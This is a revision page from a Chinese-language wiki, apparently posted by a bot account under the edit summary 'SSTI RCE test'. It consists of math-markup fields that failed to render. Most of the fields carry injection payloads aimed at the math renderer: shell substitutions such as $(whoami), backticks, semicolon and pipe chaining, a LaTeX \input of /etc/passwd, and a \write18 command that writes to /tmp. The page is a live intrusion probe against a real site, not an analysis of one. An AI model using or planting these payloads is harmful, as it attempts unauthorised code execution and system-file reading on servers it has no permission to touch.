Test MathInjection

来自希服维基
Bot93553讨论 | 贡献2026年5月9日 (六) 13:59的版本 (SSTI RCE test)
(差异) ←上一版本 | 最后版本 (差异) | 下一版本→ (差异)

math1=解析失败 (SVG(MathML可通过浏览器插件启用):从服务器“https://wikimedia.org/api/rest_v1/”返回无效的响应(“Math extension cannot connect to Restbase.”):): {\displaystyle baseline} | math2=解析失败 (SVG(MathML可通过浏览器插件启用):从服务器“https://wikimedia.org/api/rest_v1/”返回无效的响应(“Math extension cannot connect to Restbase.”):): {\displaystyle \frac{1}{2}} | math3=解析失败 (SVG(MathML可通过浏览器插件启用):从服务器“https://wikimedia.org/api/rest_v1/”返回无效的响应(“Math extension cannot connect to Restbase.”):): {\displaystyle $(whoami 2>&1)} | math4=解析失败 (SVG(MathML可通过浏览器插件启用):从服务器“https://wikimedia.org/api/rest_v1/”返回无效的响应(“Math extension cannot connect to Restbase.”):): {\displaystyle `whoami 2>&1`} | math5=解析失败 (SVG(MathML可通过浏览器插件启用):从服务器“https://wikimedia.org/api/rest_v1/”返回无效的响应(“Math extension cannot connect to Restbase.”):): {\displaystyle ;whoami 2>&1;} | math6=解析失败 (SVG(MathML可通过浏览器插件启用):从服务器“https://wikimedia.org/api/rest_v1/”返回无效的响应(“Math extension cannot connect to Restbase.”):): {\displaystyle |whoami 2>&1} | math7=解析失败 (SVG(MathML可通过浏览器插件启用):从服务器“https://wikimedia.org/api/rest_v1/”返回无效的响应(“Math extension cannot connect to Restbase.”):): {\displaystyle whoami 2>&1 } | math8=解析失败 (SVG(MathML可通过浏览器插件启用):从服务器“https://wikimedia.org/api/rest_v1/”返回无效的响应(“Math extension cannot connect to Restbase.”):): {\displaystyle \input{/etc/passwd}} | math9=解析失败 (SVG(MathML可通过浏览器插件启用):从服务器“https://wikimedia.org/api/rest_v1/”返回无效的响应(“Math extension cannot connect to Restbase.”):): {\displaystyle \immediate\write18{whoami > /tmp/math_rce.txt}}